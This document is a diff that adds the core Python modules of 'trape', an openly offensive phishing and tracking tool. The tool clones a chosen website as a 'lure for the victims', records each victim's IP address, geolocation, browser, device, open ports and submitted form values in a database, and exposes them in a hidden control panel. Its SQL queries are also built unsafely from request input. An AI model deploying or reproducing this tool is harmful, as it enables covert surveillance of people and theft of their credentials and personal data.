devhttps
diff --git a/‎core/__init__.py‎
Lines changed: 1 addition & 0 deletions b/‎core/__init__.py‎
Lines changed: 1 addition & 0 deletions
diff --git a/‎core/db.py‎
Lines changed: 101 additions & 0 deletions b/‎core/db.py‎
Lines changed: 101 additions & 0 deletions
diff --git a/‎core/sockets.py‎
Lines changed: 67 additions & 0 deletions b/‎core/sockets.py‎
Lines changed: 67 additions & 0 deletions
diff --git a/‎core/stats.py‎
Lines changed: 75 additions & 0 deletions b/‎core/stats.py‎
Lines changed: 75 additions & 0 deletions
diff --git a/‎core/trape.py‎
Lines changed: 80 additions & 0 deletions b/‎core/trape.py‎
Lines changed: 80 additions & 0 deletions
@@ -0,0 +1 @@
+pass
@@ -0,0 +1,101 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+#**
+#
+#########
+# trape #
+#########
+#
+# trape depends of this file
+# For full copyright information this visit: https://github.com/boxug/trape
+#
+# Copyright 2017 by boxug / <[email protected]>
+#**
+
+import sqlite3
+
+conn = sqlite3.connect("database.db", check_same_thread=False)
+
+def create_db():
+	c = conn.cursor()
+
+	c.execute("""CREATE TABLE IF NOT EXISTS "geo" ( `id` TEXT, `city` TEXT, `country_code` TEXT, `country_name` TEXT, `ip` TEXT, `latitude` TEXT, `longitude` TEXT, `metro_code` TEXT, `region_code` TEXT, `region_name` TEXT, `time_zone` TEXT, `zip_code` TEXT, `isp` TEXT, `ua` TEXT, PRIMARY KEY(`id`) )""")
+	c.execute("""CREATE TABLE IF NOT EXISTS "networks" ( `id` TEXT, `ip` TEXT, `public_ip` INTEGER, `network` TEXT, `date` TEXT )""")
+	c.execute("""CREATE TABLE IF NOT EXISTS "requests" ( `id` TEXT, `user_id` TEXT, `site` TEXT, `fid` TEXT, `name` TEXT, `value` TEXT, `date` TEXT )""")
+	c.execute("""CREATE TABLE IF NOT EXISTS "victims" ( `id` TEXT, `ip` TEXT, `date` TEXT, `time` REAL, `bVersion` TEXT, `browser` TEXT, `device` TEXT, `cpu` TEXT, `ports` TEXT, `status`	TEXT )""")
+	c.execute("""CREATE TABLE IF NOT EXISTS "clicks" ( `id` TEXT, `site` TEXT, `date` TEXT )""")
+	conn.commit()
+	return True
+
+def sql_execute(sentence):
+	c = conn.cursor()
+	c.execute(sentence)
+	return c.fetchall()
+
+def sql_one_row(sentence, column):
+	c = conn.cursor()
+	c.execute(sentence)
+	return c.fetchone()[column]
+
+def sql_insert(sentence):
+	c = conn.cursor()
+	c.execute(sentence)
+	conn.commit()
+	return True
+
+def prop_sentences_stats(type, vId = None):
+	return {
+		'get_data' : "SELECT victims.*, geo.*, victims.ip AS ip_local, COUNT(clicks.id) FROM victims INNER JOIN geo ON victims.id = geo.id LEFT JOIN clicks ON clicks.id = victims.id GROUP BY victims.id ORDER BY victims.time DESC",
+		'all_networks' : "SELECT networks.* FROM networks ORDER BY id",
+		'get_preview' : "SELECT victims.*, geo.*, victims.ip AS ip_local FROM victims INNER JOIN geo ON victims.id = geo.id WHERE victims.id = '%s'" % (vId),
+		'id_networks' : "SELECT networks.* FROM networks WHERE id = '%s'" % (vId),
+		'get_requests' : "SELECT requests.*, geo.ip FROM requests INNER JOIN geo on geo.id = requests.user_id ORDER BY requests.date DESC, requests.id ",
+		'get_sessions' : "SELECT COUNT(*) AS Total FROM networks",
+		'get_clicks' : "SELECT COUNT(*) AS Total FROM clicks",
+		'get_online' : "SELECT COUNT(*) AS Total FROM victims WHERE status = '%s'" % ('online')
+	}.get(type, False)
+
+def sentences_stats(type, vId = None):
+	return sql_execute(prop_sentences_stats(type, vId))
+
+def prop_sentences_victim(type, data = None):
+	if type == 'count_victim':
+		return "SELECT COUNT(*) AS C FROM victims WHERE id = '%s'" % (data)
+	elif type == 'count_times':
+		return "SELECT COUNT(*) AS C FROM clicks WHERE id = '%s'" % (data)
+	elif type == 'update_victim':
+		return "UPDATE victims SET ip = '%s', date = '%s', bVersion = '%s', browser = '%s', device = '%s', ports = '%s', time = '%s', cpu = '%s', status = '%s' WHERE id = '%s'" % (data[0].ip, data[0].date, data[0].version, data[0].browser, data[0].device, data[0].ports, data[2], data[0].cpu, 'online', data[1])
+	elif type == 'update_victim_geo':
+		return "UPDATE geo SET city = '%s', country_code = '%s', country_name = '%s', ip = '%s', latitude = '%s', longitude = '%s', metro_code = '%s', region_code = '%s', region_name = '%s', time_zone = '%s', zip_code = '%s', isp = '%s', ua='%s' WHERE id = '%s'" % (data[0].city, data[0].country_code, data[0].country_name, data[0].ip, data[0].latitude, data[0].longitude, data[0].metro_code, data[0].region_code, data[0].region_name, data[0].time_zone, data[0].zip_code, data[0].isp, data[0].ua, data[1])
+	elif type == 'insert_victim':
+		return "INSERT INTO victims(id, ip, date, bVersion, browser, device, ports, time, cpu, status) VALUES('%s','%s', '%s','%s', '%s','%s', '%s', '%s', '%s', '%s')" % (data[1], data[0].ip, data[0].date, data[0].version, data[0].browser, data[0].device, data[0].ports, data[2], data[0].cpu, 'online')
+	elif type == 'insert_victim_geo':
+		return "INSERT INTO geo(id, city, country_code, country_name, ip, latitude, longitude, metro_code, region_code, region_name, time_zone, zip_code, isp, ua) VALUES('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s')"  % (data[1], data[0].city, data[0].country_code, data[0].country_name, data[0].ip, data[0].latitude, data[0].longitude, data[0].metro_code, data[0].region_code, data[0].region_name, data[0].time_zone, data[0].zip_code, data[0].isp, data[0].ua)
+	elif type == 'count_victim_network':
+		return "SELECT COUNT(*) AS C FROM networks WHERE id = '%s' AND network = '%s'" % (data[0], data[1])
+	elif type == 'delete_networks':
+		return "DELETE FROM networks WHERE id = '%s'" % (data[0])
+	elif type == 'update_network':
+		return "UPDATE networks SET date = '%s' WHERE id = '%s' AND network = '%s'" % (data[2], data[0], data[1])
+	elif type == 'insert_networks':
+		return "INSERT INTO networks(id, public_ip, ip, network, date) VALUES('%s','%s', '%s', '%s','%s')" % (data[0], data[1], data[2], data[3], data[4])
+	elif type == 'insert_requests':
+		return "INSERT INTO requests(id, user_id, site, fid, name, value, date) VALUES('%s', '%s','%s', '%s', '%s','%s', '%s')" % (data[0].sId, data[0].id, data[0].site, data[0].fid, data[0].name, data[0].value, data[1])
+	elif type == 'insert_click':
+		return "INSERT INTO clicks(id, site, date) VALUES('%s', '%s','%s')" % (data[0], data[1], data[2])
+	elif type == 'report_online':
+		return "UPDATE victims SET status = '%s' WHERE id = '%s'" % ('online', data[0])
+	elif type == 'clean_online':
+		return "UPDATE victims SET status = '%s' " % ('offline')
+	elif type == 'disconnect_victim':
+		return "UPDATE victims SET status = '%s' WHERE id = '%s'" % ('offline', data)
+	else:
+		return False
+
+def sentences_victim(type, data = None, sRun = 1, column = 0):
+	if sRun == 2:
+		return sql_insert(prop_sentences_victim(type, data))
+	elif sRun == 3:
+		return sql_one_row(prop_sentences_victim(type, data), column)
+	else:
+		return sql_execute(prop_sentences_victim(type, data))
@@ -0,0 +1,67 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+#**
+#
+#########
+# trape #
+#########
+#
+# trape depends of this file
+# For full copyright information this visit: https://github.com/boxug/trape
+#
+# Copyright 2017 by boxug / <[email protected]>
+#**
+
+from socket import gethostname, gethostbyname 
+from threading import Lock
+from flask import Flask, render_template, session, request, json
+from flask_socketio import SocketIO, emit, join_room, rooms, disconnect
+import core.stats 
+import core.victim
+from victim_objects import attacks_hook_message
+from core.utils import utils
+from core.db import sentences_victim
+
+# Main parts, to generate relationships among others
+trape = core.stats.trape
+app = core.stats.app
+
+async_mode = None
+socketio = SocketIO(app, async_mode=async_mode)
+thread = None
+thread_lock = Lock()
+
+sentences_victim('clean_online', None, 2)
+
+def background_thread():
+    count = 0
+
+@socketio.on("join", namespace="/trape")
+def join(message):
+    join_room(message['room'])
+    session['receive_count'] = session.get('receive_count', 0) + 1
+
+@socketio.on("my_room_event", namespace="/trape")
+def send_room_message(message):
+    session['receive_count'] = session.get('receive_count', 0) + 1
+    hookAction = attacks_hook_message(message['data']['type'])
+    utils.Go(utils.Color['white'] + "[" + utils.Color['blueBold'] + "@" + utils.Color['white'] + "]" + " " + hookAction + utils.Color['blue'] + message['data']['message'] + utils.Color['white'] + ' in '  + utils.Color['green'] + message['room'] + utils.Color['white'])
+    emit('my_response', {'data': message['data'], 'count': session['receive_count']},room = message['room'])
+
+@socketio.on("disconnect_request", namespace='/trape')
+def disconnect_request(d):
+    session['receive_count'] = session.get('receive_count', 0) + 1
+    emit('my_response', {'data': 'Disconnected!', 'count': session['receive_count']})
+    utils.Go(utils.Color['white'] + "[" + utils.Color['redBold'] + "-" + utils.Color['white'] + "]" + utils.Color['red'] + " " + "A victim has closed her connection with the following id:" + " " + utils.Color['green'] + d['vId'] + utils.Color['white'])
+    sentences_victim('disconnect_victim', d['vId'], 2)
+
+@socketio.on_error("/trape")
+def error_handler(e):
+    pass
+
+@app.route("/" + trape.home_path)
+def home():
+    return render_template("home.html", async_mode=socketio.async_mode)
+
+if __name__ == 'core.sockets':
+    socketio.run(app, host= '127.0.0.1', port=trape.app_port, debug=False)
@@ -0,0 +1,75 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+#**
+#
+#########
+# trape #
+#########
+#
+# trape depends of this file
+# For full copyright information this visit: https://github.com/boxug/trape
+#
+# Copyright 2017 by boxug / <[email protected]>
+#**
+import urllib2
+from flask import Flask, render_template, session, request, json
+from core.trape import Trape
+from core.db import sentences_stats
+
+# Main parts, to generate relationships among others
+trape = Trape()
+app = Flask(__name__, template_folder='../templates', static_folder='../static')
+
+# preview header tool in console
+trape.header()
+
+@app.route("/" + trape.stats_path)
+def index():
+    return render_template("/login.html")
+
+@app.route("/logout")
+def logout():
+    return render_template("/login.html")
+
+@app.route("/login", methods=["POST"])
+def login():
+    id = request.form['id']
+    if id == trape.stats_key:
+        return json.dumps({'status':'OK', 'path' : trape.home_path, 'victim_path' : trape.victim_path, 'url_to_clone' : trape.url_to_clone, 'app_port' : trape.app_port, 'date_start' : trape.date_start, 'user_ip' : '127.0.0.1'});
+    else:
+      return json.dumps({'status':'NOPE', 'path' : '/'});
+
+@app.route("/get_data", methods=["POST"])
+def home_get_dat():
+    d = sentences_stats('get_data')
+    n = sentences_stats('all_networks')
+
+    ('clean_online')
+    rows = sentences_stats('get_clicks')
+    c = rows[0][0]
+    rows = sentences_stats('get_sessions')
+    s = rows[0][0]
+    rows = sentences_stats('get_online')
+    o = rows[0][0]
+
+    return json.dumps({'status' : 'OK', 'd' : d, 'n' : n, 'c' : c, 's' : s, 'o' : o});
+
+@app.route("/get_preview", methods=["POST"])
+def home_get_preview():
+    vId = request.form['vId']
+    d = sentences_stats('get_preview', vId)
+    n = sentences_stats('id_networks', vId)
+    return json.dumps({'status' : 'OK', 'vId' : vId, 'd' : d, 'n' : n});
+
+@app.route("/get_title", methods=["POST"])
+def home_get_title():
+    opener = urllib2.build_opener()
+    html = opener.open(trape.url_to_clone).read()
+    html = html[html.find('<title>') + 7 : html.find('</title>')]
+    return json.dumps({'status' : 'OK', 'title' : html});
+
+@app.route("/get_requests", methods=["POST"])
+def home_get_requests():
+    d = sentences_stats('get_requests')
+
+    return json.dumps({'status' : 'OK', 'd' : d});
@@ -0,0 +1,80 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+#**
+#
+#########
+# trape #
+#########
+#
+# trape depends of this file
+# For full copyright information this visit: https://github.com/boxug/trape
+#
+# Copyright 2017 by boxug / <[email protected]>
+#**
+import time
+import json
+import optparse
+import socket
+import sys
+import os
+from core.utils import utils
+from core.db import create_db
+
+class Trape(object):
+	def __init__(self):
+		self.name_trape = "trape"
+		self.stats_path = "s" + utils.generateToken(6)
+		self.home_path = "h" + utils.generateToken(18)
+		self.stats_key = utils.generateToken(24)
+		self.date_start = time.strftime("%Y-%m-%d - %H:%M:%S")
+		parser = optparse.OptionParser("python" + " " + "%prog -u <<Url>> -c <<Port>>", version="1.0.0")
+		parser.add_option('-u', '--url', dest='url', help='Put the web page url to clone')
+		parser.add_option('-p', '--port', dest='port', help='Insert your port')
+
+		(options, args) = parser.parse_args()
+
+		mandatories = ['url', 'port']
+		for m in mandatories:
+		    if not options.__dict__[m]:
+		        parser.print_help()
+		        exit(-1)
+
+		if utils.checkPort(int(options.port)) == False:
+			utils.Go("\n" + utils.Color['white'] + "[" + utils.Color['redBold'] + "x" + utils.Color['white'] + "]" + " " + "The port:" + " " + utils.Color['whiteBold'] + options.port + utils.Color['white'] + " " + "is not available, It was previously used (" + utils.Text['underline'] + "Use another port" + utils.Text['end'] + ")" + "\n")
+			exit(-1)
+
+		self.app_port = int(options.port)
+		self.url_to_clone = str(options.url)
+		self.victim_path = options.url.replace("http://", "").replace("https://", "")
+
+	# Design principal of the header of sack
+	def header(self):
+		utils.banner()
+		utils.Go(utils.Color['white'] + "\t" + utils.Color['green'] + "+" + utils.Color['white'] + "--" + utils.Color['blue'] + "=" + utils.Color['white'] + "["  + utils.Color['white'] + " Lure for the victims: " + utils.Color['blue'] + 'http://127.0.0.1:' + str(self.app_port) + '/' + self.victim_path)
+		utils.Go(utils.Color['white'] + "\t" + utils.Color['green'] + "+" + utils.Color['white'] + "--" + utils.Color['blue'] + "=" + utils.Color['white'] + "["  + utils.Color['white'] + " Control Panel Link: " + utils.Color['blue'] + "http://127.0.0.1:" + utils.Color['blue'] + str(self.app_port) + '/' + self.stats_path)
+		utils.Go(utils.Color['white'] + "\t" + utils.Color['green'] + "+" + utils.Color['white'] + "--" + utils.Color['blue'] + "=" + utils.Color['white'] + "["  + utils.Color['white'] + " Your Access key: " + utils.Color['blue'] + self.stats_key + "\n\n" + utils.Color['white'])
+		utils.Go(utils.Color['white'] + "[" + utils.Color['greenBold'] + ">" + utils.Color['white'] + "]" + utils.Color['whiteBold'] + " " + "Start time:" + " " + utils.Color['white'] + self.date_start)
+		utils.Go(utils.Color['white'] + "[" + utils.Color['greenBold'] + "¡" + utils.Color['white'] + "]" + utils.Color['white'] + " " + "Waiting for the victims to fall..." + "\n")
+
+	# Important: in the process of use is possible that will ask for the root
+	def rootConnection(self):
+		if sys.platform != "win32" and sys.platform != "cygwin":
+			if os.getuid() != 0:
+				utils.Go("\t" + "--------------------")
+				utils.Go("\t" + "> Welcome to " + self.name_trape + " <")
+				utils.Go("\t" + "--------------------")
+				utils.Go(utils.Color["blueBold"] + "[*] " + utils.Color["white"] + "Hello " + utils.Color["greenBold"] + os.uname()[1] + "," + utils.Color["white"] + " I hope you enjoy my role")
+				utils.Go(utils.Color["redBold"] + "[x] " + utils.Color["white"] + "You must run in mode " + utils.Color["whiteBold"] + "root" + utils.Color["white"] + " to be able to operate.")
+				exit(0)
+
+	# Database creation.
+	def runDatabase(self):
+		create_db()
+
+	def loadCheck(self):
+		# Detect operating system, to compose the compatibility
+		utils.checkOS()
+		
+    # the main file (trape.py)
+	def main(self):
+		import core.sockets